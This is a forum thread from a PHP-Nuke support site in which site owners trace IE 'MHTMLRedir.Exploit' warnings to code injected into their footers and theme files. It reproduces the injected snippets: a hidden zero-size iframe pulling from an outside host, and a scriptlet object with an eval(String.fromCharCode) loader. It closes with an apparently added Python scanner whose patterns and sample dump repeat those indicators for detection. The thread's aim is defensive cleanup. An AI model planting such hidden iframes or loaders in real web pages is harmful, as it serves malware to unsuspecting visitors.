Nuke Cops :: View topic - MHTMLRedir.Exploit
maczan1205 (Nuke Soldier)
Joined: Mar 30, 2004 | Posts: 32 | Location: Montréal
Posted: Tue Nov 16, 2004 4:39 pm

I have a Nuke 7.1 site that has worked great for 6 months and now users that access the site on IE are getting a warning "MHTMLRedir.Exploit" virus has been detected.

How can I check to see if my site is affected?

Is there a way to check the files? I could not find any recent modifications to any of the files and the site works fine.
Evaders99 (Site Admin)
Joined: Aug 17, 2003 | Posts: 12482
Posted: Tue Nov 16, 2004 5:19 pm

Probably an SQL injection - check your database, probably the messages or the footer

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Mesum (Support Staff)
Joined: Mar 11, 2003 | Posts: 842 | Location: Chicago
Posted: Tue Nov 16, 2004 5:51 pm

http://securityresponse.symantec.com/avcenter/venc/data/mhtmlredir.exploit.html

Added any new advertising lately?

_________________
Only FREE Dating site for Desis.
maczan1205 (Nuke Soldier)
Joined: Mar 30, 2004 | Posts: 32 | Location: Montréal
Posted: Tue Nov 16, 2004 6:12 pm

Thanks for the replies.

No Ads on the site.

How can I check for the SQL injection?

Or any suggestions on the easiest solution?

I have had a few questions about new "pop ups"
maczan1205 (Nuke Soldier)
Joined: Mar 30, 2004 | Posts: 32 | Location: Montréal
Posted: Wed Nov 17, 2004 7:56 am

Evaders99 wrote:
Probably an SQL injection - check your database, probably the messages or the footer

How can I check for this - start searching the database dump for code?

What am I looking for in the SQL - data?

Any help to point me in the right direction is appreciated.

BTW - I only have 2 messages and the text looks fine, same with the footer - only short text there also - no code.
Evaders99 (Site Admin)
Joined: Aug 17, 2003 | Posts: 12482
Posted: Wed Nov 17, 2004 9:57 am

Use phpMyAdmin to go to your config table. Look for the footer fields and see if anything is added there.
Go to your messages table and see if anything is added there.

There are possibly other areas if your site has been compromised. I would scour your database and check everything out.

maczan1205 (Nuke Soldier)
Joined: Mar 30, 2004 | Posts: 32 | Location: Montréal
Posted: Wed Nov 17, 2004 5:55 pm

Evaders99 wrote:
Use phpMyAdmin to go to your config table. Look for the footer fields and see if anything is added there.
Go to your messages table and see if anything is added there.

There are possibly other areas if your site has been compromised. I would scour your database and check everything out.

Thanks for the suggestions - Checked out the tables, not much there but simple text that matches the text entered on the web site by myself.

Users are reporting the warning as soon as they try to log in - I am at a loss as to where to check next.

I am willing to reinstall the whole site but will lose all the data - I guess I can choose a date before the Problem started and use that data.

I am still not sure what to look for in any of the tables.

Anyway, thanks for the replies!
Evaders99 (Site Admin)
Joined: Aug 17, 2003 | Posts: 12482
Posted: Wed Nov 17, 2004 6:21 pm

Give me a link to your Nuke and I'll download the HTML - if I see anything, I will tell you.

Evaders99 (Site Admin)
Joined: Aug 17, 2003 | Posts: 12482
Posted: Wed Nov 17, 2004 7:30 pm

This was added to your footer

Code:

<Iframe Src="http://2awm.com/pop/get.php?user=tt1sp" width=0 height=0></Iframe><center>


I would check your database again. Possibly your theme template too

maczan1205 (Nuke Soldier)
Joined: Mar 30, 2004 | Posts: 32 | Location: Montréal
Posted: Wed Nov 17, 2004 7:46 pm

Hey thanks a million!

I found it in the theme, header file.

Seems ok now

Much appreciated.
ybrich (Nuke Soldier)
Joined: May 25, 2003 | Posts: 16
Posted: Thu Nov 18, 2004 5:37 pm

Mine was injected into the copyright column of the config..

Sad
chukar (Nuke Cadet)
Joined: Nov 19, 2004 | Posts: 7
Posted: Fri Nov 19, 2004 8:37 am

I'm also getting this problem with 7.2 and have searched for the above code but can't locate it.

I have the site secured by restricting my .htaccess file to my ip address, so it's hard to see how someone could get in and insert that code.

I'm mystified.
Evaders99 (Site Admin)
Joined: Aug 17, 2003 | Posts: 12482
Posted: Fri Nov 19, 2004 10:15 am

Have a link? Well it really does depend on the tricks the hackers know. IP protection helps, but there are other ways to get through to your site.

kewlbrew (Nuke Soldier)
Joined: Sep 03, 2004 | Posts: 22
Posted: Fri Nov 19, 2004 1:25 pm

I'm having the same trouble. Every time anyone clicks anything they get a small pop-up. I use Nuke 7.0 and checked my header file but didn't see anything. If anyone can take a look at the code, it's at www.gonewanderin.com/indexold.php. I would appreciate it very much.


Last edited by kewlbrew on Sat Nov 20, 2004 6:55 am; edited 1 time in total
Evaders99 (Site Admin)
Joined: Aug 17, 2003 | Posts: 12482
Posted: Fri Nov 19, 2004 1:57 pm

This was added to your footer:
Code:

 <TEXTAREA id=cxw style="DISPLAY: none"><object data="${PR}" id="obj1" type="text/x-scriptlet" width="0" height="0"></object></TEXTAREA><SCRIPT>                                                                                                                                          </SCRIPT><script language='JavaScript'>eval(String.fromCharCode(**));</script>


Delete from your footer in your database. Read and secure your site: http://www.nukecops.com/postt32206.html

Edit: I went ahead and deleted the characters for **, so someone else cannot try to get this code.

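As an added example (not code from this thread, from Evaders99, or from PHP-Nuke), the following Python script mechanises the checks recommended above: it walks a mysqldump of the site and attributes hits to the table they sit in (so a poisoned footer in nuke_config or a message row stands out), and runs the same check over theme header/footer files, which is where maczan1205 eventually found his copy. The indicators are generalised from the two snippets posted in this thread: a zero-size iframe, a textarea hidden with display:none wrapping a text/x-scriptlet object, and an eval(String.fromCharCode(...)) loader. The table names, file paths, sample dump and indicator names are constructed for the demonstration and are not from the original site.

```python
import re

# Indicator patterns generalised from the two injected snippets in this
# thread. The names are ours (constructed), not anything PHP-Nuke defines.
INDICATORS = {
    # <iframe ... width=0 height=0>: an invisible frame pulling a remote page
    "hidden_iframe": re.compile(
        r"<iframe\b[^>]*\b(?:width|height)\s*=\s*['\"]?0['\"]?[^>]*>", re.I),
    # <textarea style="display: none">: hides whatever is wrapped inside it
    "hidden_textarea": re.compile(
        r"<textarea\b[^>]*display\s*:\s*none[^>]*>", re.I),
    # <object type="text/x-scriptlet">: the MHTML/scriptlet loader object
    "scriptlet_object": re.compile(
        r"<object\b[^>]*type\s*=\s*['\"]?text/x-scriptlet", re.I),
    # eval(String.fromCharCode(...)): obfuscated script assembled at runtime
    "fromcharcode_eval": re.compile(
        r"eval\s*\(\s*String\.fromCharCode\s*\(", re.I),
}

# Matches the table name in a mysqldump INSERT statement.
INSERT_RE = re.compile(r"INSERT\s+INTO\s+`?(\w+)`?", re.I)


def find_indicators(text):
    """Return [(indicator_name, snippet)] for every indicator found in text."""
    hits = []
    for name, pattern in INDICATORS.items():
        for match in pattern.finditer(text):
            start = max(0, match.start() - 20)       # a little leading context
            hits.append((name, text[start:match.end()][:120]))
    return hits


def scan_sql_dump(dump):
    """Walk a mysqldump line by line; tag each hit with the INSERT's table."""
    findings = []
    table = "?"
    for line in dump.splitlines():
        m = INSERT_RE.search(line)
        if m:
            table = m.group(1)                        # remember current table
        for name, snippet in find_indicators(line):
            findings.append((f"table:{table}", name, snippet))
    return findings


def scan_files(files):
    """files: {path: content}. Same check over theme header/footer sources."""
    findings = []
    for path, content in files.items():
        for name, snippet in find_indicators(content):
            findings.append((f"file:{path}", name, snippet))
    return findings


# Constructed sample dump: a nuke_config row whose footer carries the iframe,
# and a clean message row. The attacker host is a placeholder, not real.
SAMPLE_DUMP = """-- constructed sample dump, not a real site
INSERT INTO `nuke_config` VALUES ('My Site','admin@example.invalid','<Iframe Src="http://attacker.invalid/pop/get.php?user=x" width=0 height=0></Iframe><center>','Copyright 2004');
INSERT INTO `nuke_message` VALUES (1,'Welcome','Welcome to the site',1);
"""

# Constructed sample theme files: header.php carries the hidden textarea,
# scriptlet object and fromCharCode loader; footer.php is clean.
SAMPLE_THEME = {
    "themes/FI/header.php": (
        "<?php\n"
        "echo '<TEXTAREA id=cxw style=\"DISPLAY: none\"><object data=\"x\" "
        "id=\"obj1\" type=\"text/x-scriptlet\" width=\"0\" height=\"0\">"
        "</object></TEXTAREA>';\n"
        "echo '<script>eval(String.fromCharCode(60,115));</script>';\n"
    ),
    "themes/FI/footer.php": "<?php\necho '<div class=\"footer\">Plain text footer</div>';\n",
}


if __name__ == "__main__":
    for source, name, snippet in scan_sql_dump(SAMPLE_DUMP) + scan_files(SAMPLE_THEME):
        print(f"{source:28} {name:18} {snippet!r}")
```

Run it against a real dump by reading the file into scan_sql_dump and loading the theme directory into the dict scan_files expects. An empty result only means these four patterns are absent; it says nothing about other fields, other tables or how the content got there, which is why the thread's advice to scour the whole database, and to close the hole before restoring from a backup taken before the first report, still stands.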
Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com